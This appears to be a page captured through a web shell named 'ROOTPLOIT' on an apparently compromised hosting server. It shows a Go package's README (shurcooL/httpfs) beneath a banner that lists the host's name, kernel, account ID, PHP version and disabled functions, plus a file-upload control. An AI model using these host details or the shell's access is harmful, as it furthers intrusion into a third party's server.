ROOTPLOIT
Server: LiteSpeed
System: Linux in-mum-web1878.main-hosting.eu 5.14.0-570.21.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jun 11 07:22:35 EDT 2025 x86_64
User: u435929562 (435929562)
PHP: 7.4.33
Disabled: system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Upload Files
File: //opt/go/pkg/mod/github.com/shurcoo!l/[email protected]/README.md
httpfs
======

[![Go Reference](https://pkg.go.dev/badge/github.com/shurcooL/httpfs.svg)](https://pkg.go.dev/github.com/shurcooL/httpfs)

Collection of Go packages for working with the [`http.FileSystem`](https://go.dev/pkg/net/http#FileSystem) interface.

Installation
------------

```sh
go get github.com/shurcooL/httpfs
```

Directories
-----------

| Path                                                                               | Synopsis                                                                                                   |
|------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------|
| [filter](https://pkg.go.dev/github.com/shurcooL/httpfs/filter)                     | Package filter offers an http.FileSystem wrapper with the ability to keep or skip files.                   |
| [html/vfstemplate](https://pkg.go.dev/github.com/shurcooL/httpfs/html/vfstemplate) | Package vfstemplate offers html/template helpers that use http.FileSystem.                                 |
| [httputil](https://pkg.go.dev/github.com/shurcooL/httpfs/httputil)                 | Package httputil implements HTTP utility functions for http.FileSystem.                                    |
| [path/vfspath](https://pkg.go.dev/github.com/shurcooL/httpfs/path/vfspath)         | Package vfspath implements utility routines for manipulating virtual file system paths.                    |
| [text/vfstemplate](https://pkg.go.dev/github.com/shurcooL/httpfs/text/vfstemplate) | Package vfstemplate offers text/template helpers that use http.FileSystem.                                 |
| [union](https://pkg.go.dev/github.com/shurcooL/httpfs/union)                       | Package union offers a simple http.FileSystem that can unify multiple filesystems at various mount points. |
| [vfsutil](https://pkg.go.dev/github.com/shurcooL/httpfs/vfsutil)                   | Package vfsutil implements some I/O utility functions for http.FileSystem.                                 |

License
-------

-	[MIT License](LICENSE)